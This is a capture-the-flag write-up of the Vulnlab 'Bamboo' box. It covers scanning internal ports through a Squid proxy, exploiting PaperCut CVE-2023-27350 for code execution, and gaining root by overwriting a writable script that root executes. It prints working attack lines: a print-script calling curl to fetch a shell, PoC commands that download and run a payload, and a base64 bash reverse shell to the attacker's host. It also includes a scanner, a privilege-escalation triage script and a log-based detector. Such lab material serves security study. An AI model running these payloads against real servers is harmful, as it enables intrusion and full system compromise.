Bamboo - VL
Bamboo - Printers goes wild!
Bamboo is a Medium machine from Vulnlab. I exploit a PaperCut CVE through a Squid proxy to get the foothold, then explore the PaperCut web app with pspy running on the box to catch a shell script that root executes when a certain button is clicked. That script is writable by my user, so I drop a reverse shell into it and trigger it again through the same PaperCut feature.
Recon
Nmap
As always, running nmap:
```
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open  http-proxy Squid http proxy 5.2
```
Squid is a caching forward proxy that sits between clients and the internet, forwarding requests while caching content to improve speed and reduce bandwidth. The interesting part here is that an exposed Squid which is allowed to forward to its own host lets me reach services bound to localhost or firewalled from the outside, which is why nmap only sees two ports.
Squid Proxy
For further enumeration I could use spose.py to enumerate the internal open ports through the proxy, but I'd rather use xct's squidscanner.
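What both of those scanners do, written out as a small added example (not code from the original post, and not spose.py or squidscanner): ask Squid for `http://TARGET:PORT/` and read its reaction. A failed backend connect comes back as a 503 with an `X-Squid-Error: ERR_CONNECT_FAIL 111` header; any other answer, including Squid complaining that the service did not speak HTTP, means the proxy reached the port. The `PROXY` and `TARGET` values are assumptions taken from this box.

```python
#!/usr/bin/env python3
"""Port enumeration through a Squid forward proxy.

Added example, not code from the original post and not xct's squidscanner or
spose.py. Ask the proxy for http://TARGET:PORT/ and classify Squid's reply:
a 503 carrying X-Squid-Error ERR_CONNECT_FAIL means the backend connect
failed; anything else (a real HTTP answer, or ERR_READ_ERROR/ERR_INVALID_RESP
because the service is not HTTP) means the proxy reached the port.
PROXY and TARGET are assumptions.
"""
import re
import socket

PROXY = ("10.10.67.181", 3128)   # assumption: the Squid instance from the post
TARGET = "127.0.0.1"             # the proxy host's own loopback, as Squid sees it

# Squid error codes that mean "the proxy could not connect to the backend".
CLOSED_ERRORS = ("ERR_CONNECT_FAIL", "ERR_DNS_FAIL", "ERR_SOCKET_FAILURE")
# An ACL denial is the proxy refusing us, not the port being closed.
DENIED_ERRORS = ("ERR_ACCESS_DENIED",)


def parse_response(raw: bytes):
    """Return (status_code, squid_error) from a raw HTTP reply.

    squid_error is the first token of the X-Squid-Error header, or None.
    A missing or garbled status line yields status 0.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1", "replace")
    lines = head.split("\r\n")
    m = re.match(r"HTTP/\d\.\d\s+(\d{3})", lines[0])
    status = int(m.group(1)) if m else 0
    squid_error = None
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "x-squid-error":
            squid_error = value.strip().split(" ", 1)[0]
            break
    return status, squid_error


def classify(status: int, squid_error) -> str:
    """Map a proxy reply to open / closed / denied / unknown."""
    if squid_error in CLOSED_ERRORS:
        return "closed"
    if squid_error in DENIED_ERRORS:
        return "denied"
    if status == 0:
        return "unknown"
    return "open"   # 200, 401, 500, ERR_READ_ERROR...: the connect succeeded


def probe(port: int, proxy=PROXY, target=TARGET, timeout: float = 3.0) -> str:
    """Request http://target:port/ via the proxy and classify Squid's answer."""
    req = (f"GET http://{target}:{port}/ HTTP/1.1\r\n"
           f"Host: {target}:{port}\r\n"
           "Connection: close\r\n\r\n").encode()
    raw = b""
    try:
        with socket.create_connection(proxy, timeout=timeout) as s:
            s.sendall(req)
            while b"\r\n\r\n" not in raw:           # read until end of headers
                chunk = s.recv(4096)
                if not chunk:
                    break
                raw += chunk
    except OSError:
        return "unknown"                           # proxy down or timed out
    return classify(*parse_response(raw))


def scan(ports, **kw):
    """Return the sorted list of ports the proxy could connect to."""
    return sorted(p for p in ports if probe(p, **kw) == "open")


if __name__ == "__main__":
    # The ports the post found plus a couple of controls; use range(1, 65536)
    # for a full sweep (slow: one proxy round trip per port).
    for p in (22, 80, 3128, 9173, 9174, 9191, 9192, 9195):
        print(f"{p:5d} {probe(p)}")
```

The classifier is the part worth getting right: treating every non-200 as closed would miss SSH on 22, which Squid reports as an error page because the banner is not HTTP, yet the connect did succeed. Only the connect-failure codes mean closed.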
First, I update IP:PORT in the scanner's source, then build it and scan the ports.
```
go mod tidy
go build
```
Running it does yield the open ports (progress-bar output trimmed):
```
➜ Bamboo ./squidscan
Port 22 found!
Port 9195 found!
Port 9192 found!
Port 9173 found!
Port 9174 found!
Port 9191 found!
```
The most suspicious one is 9191; I know it because there is a room on TryHackMe exploiting PaperCut, which is what we are exploiting on this box. 9191 and 9192 are PaperCut NG/MF's default HTTP and HTTPS ports. I can fetch the page with cURL using the --proxy flag.
```
➜ Bamboo curl --proxy 10.10.67.181:3128 http://10.10.67.181:9191/user
<!DOCTYPE HTML>
<!-- Application: app-server -->
<!-- Page: Home -->
<!-- Generated: Tue Aug 26 21:30:07 UTC 2025 -->
<html lang="en">
<SNIP>
<polygon points="37.7,198.5 140.4,198.5 96.3,136.3 "/>
<polygon points="0,79.5 0,198.5 37.7,198.5 96.3,136.3 45,63.6 "/>
<polygon points="0,79.5 45,63.6 0,0 "/>
<polygon points="0,79.5 0,79.5 0,79.5 "/>
<polygon points="262.3,198.5 280.7,198.5 265.7,187.9 "/>
<polygon points="224.8,198.5 262.3,198.5 265.7,187.9 224.8,159 "/>
</svg>
<SNIP>
<!-- Render time: ~ 18 ms -->
```
The response headers confirm both the app and the proxy in the path (the Via and X-Cache headers are Squid's):
```
➜ Bamboo curl -I --proxy 10.10.67.181:3128 http://10.10.67.181:9191/user
HTTP/1.1 200 OK
Date: Tue, 26 Aug 2025 21:32:48 GMT
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1
Set-Cookie: JSESSIONID=node01xs1e3dk67sgb1h6ea8m5xmdio2.node0; Path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Length: 12392
X-Cache: MISS from bamboo
X-Cache-Lookup: MISS from bamboo:3128
Via: 1.1 bamboo (squid/5.2)
Connection: keep-alive
```
# as Papercut
PaperCut CVE
Since it's a web port, we can add the Squid proxy to FoxyProxy and browse to the page.
PaperCut has the CVE I mentioned above: CVE-2023-27350, an authentication bypass on the admin web interface. Browsing to /app?service=page/SetupCompleted and clicking Login lands you on the dashboard as admin. For a shell, the printer Scripting feature (Print Scripting) executes server-side JavaScript inside the PaperCut Java process, so a script can reach java.lang.Runtime once scripting is enabled and the script sandbox is off. CVE-2023-27350 PoC
The steps are these:
- Go to http://10.10.67.181:9191/app?service=page/SetupCompleted
- Click Login; it redirects to the Dashboard, now authenticated as admin.
- Options -> set print-and-device.script.enabled to Y
- Printers -> [Template Printer] -> Scripting -> insert the code snippet to execute
- Click Apply
Code Snippet:
```javascript
//
// Customize your print process with Print Scripting. You don't have to be a
// programmer to use Print Scripting. Use one of the many pre-written recipes
// already written for you, or write your own in JavaScript using snippets and
// reference documentation.
//
function printJobHook(inputs, actions) {
  // your script here
}
// Placed outside the hook so it runs when the script is validated on Apply,
// not only when a print job arrives. Replace IP with the listener host.
java.lang.Runtime.getRuntime().exec('curl IP/shell');
```
I attempted to exploit PaperCut manually, but remote code execution failed. Applying the code snippet gave me the error below, saying it doesn't know what java is, but the PoC worked out of the box.
Error:
```
The script failed to validate, check the script syntax: ReferenceError: "java" is not defined. (printer-script#2)
```
That error is the print-script sandbox: while print.script.sandboxed is Y the script engine does not expose java.*, so java.lang.Runtime is an undefined reference. The PoC sets that key to N before running the command and puts it back afterwards, which is the "Updating print.script.sandboxed to Y" line in its output further down. If you go the manual route, flip that key in the Options config editor alongside print-and-device.script.enabled.
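The defender's view of the two things done so far, as an added example (not code from the original post): a client sweeping many distinct ports on one host through the proxy, and a request for the CVE-2023-27350 bypass page. It parses Squid's default "squid" logformat, which is what the machine's /var/log/squid/access.log uses. The log lines are constructed for the example and the thresholds are assumptions.

```python
#!/usr/bin/env python3
"""Spot proxy port sweeps and the PaperCut auth-bypass URL in Squid's access.log.

Added example, not code from the original post. Lines are in Squid's default
"squid" logformat: epoch.ms, elapsed ms, client, result/status, bytes, method,
URL, user, hierarchy/peer, mime type. SAMPLE_LOG is constructed; the
min_ports and window thresholds are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed: 24 probes of 127.0.0.1:9170-9193 within one second, the bypass
# URL, the login POST that follows it, and an unrelated user on the portal.
SAMPLE_LOG = "".join(
    f"1756244007.{i * 40:03d}      9 10.8.7.35 TCP_MISS/503 3984 GET "
    f"http://127.0.0.1:{9170 + i}/ - HIER_NONE/- text/html\n"
    for i in range(24)
) + """\
1756244168.510     31 10.8.7.35 TCP_MISS/200 9876 GET http://10.10.67.181:9191/app?service=page/SetupCompleted - HIER_DIRECT/10.10.67.181 text/html
1756244170.002     40 10.8.7.35 TCP_MISS/302 0 POST http://10.10.67.181:9191/app - HIER_DIRECT/10.10.67.181 text/html
1756244300.700     15 10.10.5.9 TCP_MISS/200 4321 GET http://10.10.67.181:9191/user - HIER_DIRECT/10.10.67.181 text/html
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+"
    r"(?P<result>[A-Z_]+)/(?P<status>\d{3})\s+(?P<bytes>\d+)\s+(?P<method>\S+)\s+"
    r"(?P<url>\S+)\s+(?P<user>\S+)\s+(?P<hier>\S+)\s+(?P<mime>\S+)$")

BYPASS_MARKER = "service=page/setupcompleted"   # CVE-2023-27350 entry point


def host_port(method, url):
    """Destination host and port of a proxied request (CONNECT has no scheme)."""
    if method == "CONNECT":
        host, _, port = url.rpartition(":")
        return host, int(port)
    u = urlsplit(url)
    return u.hostname, u.port or (443 if u.scheme == "https" else 80)


def parse(text):
    """Parse access.log text into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = float(e["ts"])
        e["status"] = int(e["status"])
        e["host"], e["port"] = host_port(e["method"], e["url"])
        entries.append(e)
    return entries


def bypass_hits(entries):
    """Every request for the SetupCompleted page, whatever the status code."""
    return [e for e in entries if BYPASS_MARKER in e["url"].lower()]


def port_scanners(entries, min_ports=20, window=60.0):
    """(client, host) pairs that touched >= min_ports distinct ports within
    `window` seconds, mapped to the peak distinct-port count seen."""
    by_key = defaultdict(list)
    for e in entries:
        by_key[(e["client"], e["host"])].append((e["ts"], e["port"]))
    flagged = {}
    for key, hits in by_key.items():
        hits.sort()
        in_window = defaultdict(int)   # port -> hits inside the sliding window
        lo = 0
        for ts, port in hits:
            in_window[port] += 1
            while hits[lo][0] < ts - window:   # evict hits older than window
                old = hits[lo][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                lo += 1
            if len(in_window) >= min_ports:
                flagged[key] = max(flagged.get(key, 0), len(in_window))
    return flagged


if __name__ == "__main__":
    log = parse(SAMPLE_LOG)
    for (client, host), n in port_scanners(log).items():
        print(f"[scan]   {client} probed {n} ports on {host} via the proxy")
    for e in bypass_hits(log):
        print(f"[bypass] {e['client']} -> {e['url']} ({e['status']})")
```

The bypass check deliberately ignores the status code: the page returns 200 to anyone, so a 200 on that URL is the hit, not a miss. Note that only the GET carrying the query string is visible in the proxy log; the POST that logs you in goes to /app with no marker, which is why the example keys on the first request.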
I’ll update my proxychains first.
```
➜ ~ tail -n 5 /etc/proxychains.conf h
==> /etc/proxychains.conf <==
# meanwhile
# defaults set to "tor"
#socks4 127.0.0.1 9050
http 10.10.67.181 3128
```
Then I transfer the reverse-shell script onto the box, make it executable and run it, all through the PoC's --command option.
```
➜ Bamboo proxychains -q uv run CVE-2023-27350/CVE-2023-27350.py --url http://10.10.67.181:9191 --command "curl 10.8.7.35/xf -o xf"
<SNIP>
[+] Executed successfully!
<SNIP>
[*] Updating print.script.sandboxed to Y
➜ Bamboo proxychains -q uv run CVE-2023-27350/CVE-2023-27350.py --url http://10.10.67.181:9191 --command "chmod +x xf; ./xf"
<SNIP>
[+] Executed successfully!
<SNIP>
➜ Bamboo proxychains -q uv run CVE-2023-27350/CVE-2023-27350.py --url http://10.10.67.181:9191 --command "./xf"
<SNIP>
[+] Executed successfully!
<SNIP>
```
You could use busybox nc IP PORT, but I'm using penelope to handle my shells.
```
➜ ~ penelope
[+] Listening for reverse shells on 10.8.7.35
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from bamboo~10.10.67.181-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
papercut@bamboo:~/server$
papercut@bamboo:~/server$ wc -l ../user.txt
1 ../user.txt
```
# as root
At this point I spent some time looking around for a privesc; when I couldn't figure it out, I looked at the VL wiki, which says:
Explore the web application while looking at the output of pspy64. Something inside the user’s home folder will be executed as root.
So I uploaded pspy to the machine and started looking around.
```
papercut@bamboo:~/server$ wget 10.8.7.35/pspy64
<SNIP>
pspy64 100%[=============================================>] 2.96M 323KB/s in 11s
<SNIP>
```
On the attacker side:
```
10.10.67.181 - - [[26/Aug/2025 23:23:25]] "GET /pspy64 HTTP/1.1" 200 -
```
Running pspy doesn’t show anything instantly.
```
papercut@bamboo:~/server$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
<SNIP banner>
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/08/26 22:25:09 CMD: UID=1001 PID=1397 | ./pspy64
2025/08/26 22:25:09 CMD: UID=1001 PID=1381 | /bin/bash -i
<PENELOPE AGENT PROCESS>
2025/08/26 22:25:09 CMD: UID=1001 PID=1352 | /bin/bash
2025/08/26 22:25:09 CMD: UID=1001 PID=1351 | /bin/sh ./xf
2025/08/26 22:25:09 CMD: UID=0 PID=1338 |
2025/08/26 22:25:09 CMD: UID=0 PID=1336 |
2025/08/26 22:25:09 CMD: UID=0 PID=1316 |
2025/08/26 22:25:09 CMD: UID=0 PID=1305 |
2025/08/26 22:25:09 CMD: UID=0 PID=1236 |
2025/08/26 22:25:09 CMD: UID=0 PID=1213 |
2025/08/26 22:25:09 CMD: UID=13 PID=720 | (pinger)
2025/08/26 22:25:09 CMD: UID=13 PID=711 | (logfile-daemon) /var/log/squid/access.log
2025/08/26 22:25:09 CMD: UID=13 PID=701 | (squid-1) --kid squid-1 --foreground -sYC
2025/08/26 22:25:09 CMD: UID=0 PID=687 | /usr/libexec/polkitd --no-debug
<SNIP>
2025/08/26 22:25:09 CMD: UID=0 PID=652 | /usr/sbin/squid --foreground -sYC
2025/08/26 22:25:09 CMD: UID=114 PID=642 | /usr/sbin/chronyd -F 1
2025/08/26 22:25:09 CMD: UID=114 PID=638 | /usr/sbin/chronyd -F 1
2025/08/26 22:25:09 CMD: UID=1001 PID=636 | /home/papercut/server/bin/linux-x64/./app-monitor /home/papercut/server/bin/linux-x64/./app-monitor.conf wrapper.syslog.ident=papercut-app-server wrapper.pidfile=/home/papercut/server/bin/linux-x64/../../logs/papercut-app-server.pid
2025/08/26 22:25:09 CMD: UID=0 PID=605 | sshd: /usr/sbin/sshd -D -o AuthorizedKeysCommand /usr/share/ec2-instance-connect/eic_run_authorized_keys %u %f -o AuthorizedKeysCommandUser ec2-instance-connect [listener] 0 of 10-100 startups
2025/08/26 22:25:09 CMD: UID=0 PID=576 | v2023-02-14-1341/pc-print-deploy-server -dataDir=/home/papercut/providers/print-deploy/linux-x64//data -pclog.dev
2025/08/26 22:25:09 CMD: UID=0 PID=541 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2025/08/26 22:25:09 CMD: UID=0 PID=537 | /sbin/agetty -o -p -- \u --keep-baud 115200,57600,38400,9600 ttyS0 vt220
2025/08/26 22:25:09 CMD: UID=0 PID=529 | /lib/systemd/systemd-logind
2025/08/26 22:25:09 CMD: UID=0 PID=527 | /usr/lib/snapd/snapd
2025/08/26 22:25:09 CMD: UID=104 PID=524 | /usr/sbin/rsyslogd -n -iNONE
2025/08/26 22:25:09 CMD: UID=1001 PID=523 | /usr/bin/perl /home/papercut/providers/web-print/linux-x64/pc-web-print
2025/08/26 22:25:09 CMD: UID=0 PID=522 | /home/papercut/providers/print-deploy/linux-x64/pc-print-deploy
2025/08/26 22:25:09 CMD: UID=1001 PID=521 | /bin/sh /home/papercut/server/bin/linux-x64/app-server startd
2025/08/26 22:25:09 CMD: UID=0 PID=520 | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
2025/08/26 22:25:09 CMD: UID=0 PID=518 | /usr/sbin/irqbalance --foreground
2025/08/26 22:25:09 CMD: UID=102 PID=511 | @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2025/08/26 22:25:09 CMD: UID=0 PID=510 | /usr/sbin/cron -f -P
2025/08/26 22:25:09 CMD: UID=0 PID=506 | /usr/sbin/acpid
2025/08/26 22:25:09 CMD: UID=101 PID=471 | /lib/systemd/systemd-resolved
2025/08/26 22:25:09 CMD: UID=100 PID=469 | /lib/systemd/systemd-networkd
2025/08/26 22:25:09 CMD: UID=0 PID=331 |
2025/08/26 22:25:09 CMD: UID=0 PID=241 |
2025/08/26 22:25:09 CMD: UID=0 PID=240 |
2025/08/26 22:25:09 CMD: UID=0 PID=213 | /lib/systemd/systemd-udevd
2025/08/26 22:25:09 CMD: UID=0 PID=210 | /sbin/multipathd -d -s
2025/08/26 22:25:09 CMD: UID=0 PID=209
```
Worth noting in that listing before anything is clicked: the app-server (PID 521, app-server startd) runs as papercut, UID 1001, but the print-deploy components (PID 522 pc-print-deploy and PID 576 pc-print-deploy-server) run as root, UID 0, out of the papercut user's own home directory. That is the mismatch the privesc will use.
I tried for some hours to mess around with the PaperCut web app but couldn't find anything that triggered. It took me a very long time to figure out, but it was very simple.
The steps are:
- Enable Printing tab
- Click Import BYOD-friendly print queues on the right side
- Click Next
- Click Start Importing Mobility Print printers
With pspy still running, that click produces:
```
2025/08/26 22:32:49 CMD: UID=0 PID=1436 | bash -c "/home/papercut/server/bin/linux-x64/server-command" get-config health.api.key
2025/08/26 22:32:49 CMD: UID=0 PID=1437 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2025/08/26 22:32:49 CMD: UID=0 PID=1438 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2025/08/26 22:32:49 CMD: UID=0 PID=1439 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2025/08/26 22:32:49 CMD: UID=0 PID=1440 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2025/08/26 22:32:49 CMD: UID=??? PID=1442 | ???
2025/08/26 22:32:49 CMD: UID=0 PID=1446 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2025/08/26 22:32:49 CMD: UID=0 PID=1445 | <SNIP long command>
2025/08/26 22:32:49 CMD: UID=0 PID=1444 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2025/08/26 22:32:49 CMD: UID=0 PID=1447 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2025/08/26 22:32:51 CMD: UID=0 PID=1466 | /usr/bin/python3 -Es /usr/bin/lsb_release -sd
```
It's running server-command, PaperCut's Linux server CLI wrapper script, to read the health.api.key config value. The caller is root (UID 0), almost certainly the print-deploy component, since that is the part of PaperCut running as root and the root shell obtained below lands in its working directory. The script itself lives in the papercut user's home and is owned by papercut, so the user I already have can rewrite it, and root executes whatever is in it: a writable file run by a privileged process, which is the whole privesc.
```
papercut@bamboo:~/server/bin/linux-x64$ ls -lah server-command
-rwxr-xr-x 1 papercut papercut 493 Sep 29 2022 server-command
```
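Finding this by hand meant reading the pspy stream for UID=0 lines and checking each path. The added example below (not code from the original post, and not part of pspy) does that triage mechanically: it keeps the commands pspy saw running as root, pulls every absolute path out of them, and reports the ones an unprivileged user can change, either because that user owns the file or because it is group/world writable. The pspy lines in `demo()` are constructed after the listing above and point at a throw-away file so the script runs offline.

```python
#!/usr/bin/env python3
"""Triage pspy output for root-executed files an unprivileged user can modify.

Added example, not code from the original post or from pspy. It takes pspy
"CMD:" lines, keeps the ones run as UID=0, pulls every absolute path out of the
command, and reports the paths that a non-root user can change: owned by the
current (non-root) user, or group/world writable. The demo() lines are
constructed after the listing in the post and point at a throw-away file.
"""
import os
import re
import tempfile

CMD_RE = re.compile(r"CMD:\s+UID=(?P<uid>\S+)\s+PID=(?P<pid>\S+)\s+\|\s*(?P<cmd>.*)$")
PATH_RE = re.compile(r"/[\w./-]+")   # absolute paths; stops at quotes and spaces


def root_exec_paths(lines):
    """Yield (pid, path) for every absolute path in a command run as UID 0."""
    for line in lines:
        m = CMD_RE.search(line)
        if not m or m.group("uid") != "0":
            continue
        for path in PATH_RE.findall(m.group("cmd")):
            yield m.group("pid"), path


def writable_by_unprivileged(path, me=None):
    """True if the file exists and a non-root user can change it."""
    me = os.getuid() if me is None else me
    try:
        st = os.stat(path)
    except OSError:
        return False                             # path does not exist here
    if not os.path.isfile(path):
        return False
    owned_by_me = st.st_uid == me and me != 0
    loose_mode = bool(st.st_mode & 0o022)        # group- or world-writable
    return owned_by_me or loose_mode


def writable_root_targets(lines, me=None):
    """Sorted, de-duplicated paths that root executes and we could rewrite."""
    return sorted({p for _, p in root_exec_paths(lines)
                   if writable_by_unprivileged(p, me)})


def demo():
    """Run the triage on constructed pspy lines; returns (flagged, script)."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "server-command")
        with open(script, "w") as f:
            f.write("#!/bin/sh\necho stand-in for the real wrapper\n")
        os.chmod(script, 0o666)                  # constructed: loose permissions
        lines = [
            f'2025/08/26 22:32:49 CMD: UID=0 PID=1436 | bash -c "{script}" get-config health.api.key',
            f'2025/08/26 22:32:49 CMD: UID=0 PID=1437 | /bin/sh {script} get-config health.api.key',
            '2025/08/26 22:32:49 CMD: UID=??? PID=1442 | ???',
            '2025/08/26 22:32:51 CMD: UID=0 PID=1466 | /usr/bin/python3 -Es /usr/bin/lsb_release -sd',
            '2025/08/26 22:25:09 CMD: UID=1001 PID=1397 | ./pspy64',
        ]
        return writable_root_targets(lines), script


if __name__ == "__main__":
    flagged, _ = demo()
    print("\n".join(flagged) or "nothing writable")
```

On the real box you would pipe `./pspy64` through this instead of `demo()`; /bin/sh and /usr/bin/python3 drop out because root owns them with 0755, and server-command stays because papercut owns it. The `me != 0` guard is there so that running the triage as root does not flag every root-owned binary on the system.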
I'll hit F12 in my penelope shell to background it and type payloads to copy a payload, then write it into server-command.
```
papercut@bamboo:~/server/bin/linux-x64$
[!] Session detached ⇲
(Penelope)─(Session [1])> payloads
TCPListener(0.0.0.0:4444)
➤ tun0 → 10.8.7.35:4444
Bash TCP
printf KGJhc2ggPiYgL2Rldi90Y3AvMTAuOC43LjM1LzQ0NDQgMD4mMSkgJg==|base64 -d|bash
<SNIP>
────────────────────────────────────────────────────────────────────────────────
(Penelope)─(Session [1])> sessions 1
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
papercut@bamboo:~/server/bin/linux-x64$ echo "printf KGJhc2ggPiYgL2Rldi90Y3AvMTAuOC43LjM1LzQ0NDQgMD4mMSkgJg==|base64 -d|bash" > server-command
```
The base64 decodes to `(bash >& /dev/tcp/10.8.7.35/4444 0>&1) &`; the trailing `&` matters, because the caller runs server-command synchronously and waits for it to exit.
Now that I have written the bash shell into server-command, I trigger it again via the same Mobility Print import steps. Overwriting the script this way breaks the real wrapper that the app depends on, so outside a lab copy it aside first and restore it afterwards, or append the payload to the existing script instead of replacing it.
And I have a shell.
```
[+] Got reverse shell from bamboo~10.10.67.181-Linux-x86_64 😍️ Assigned SessionID <2>
```
Now I can grab the root.txt
```
papercut@bamboo:~/server/bin/linux-x64$
[!] Session detached ⇲
(Penelope)─(Session [1])> sessions
➤ bamboo~10.10.67.181-Linux-x86_64
ID  | Shell | User           | Source
[1] | PTY   | papercut(1001) | TCPListener(0.0.0.0:4444)
<2> | Basic | root(0)        | TCPListener(0.0.0.0:4444)
(Penelope)─(Session [1])> sessions 2
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [2], Shell Type: PTY, Menu key: F12
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
root@bamboo:/home/papercut/providers/print-deploy/linux-x64# wc -c /root/root.txt
37 /root/root.txt
```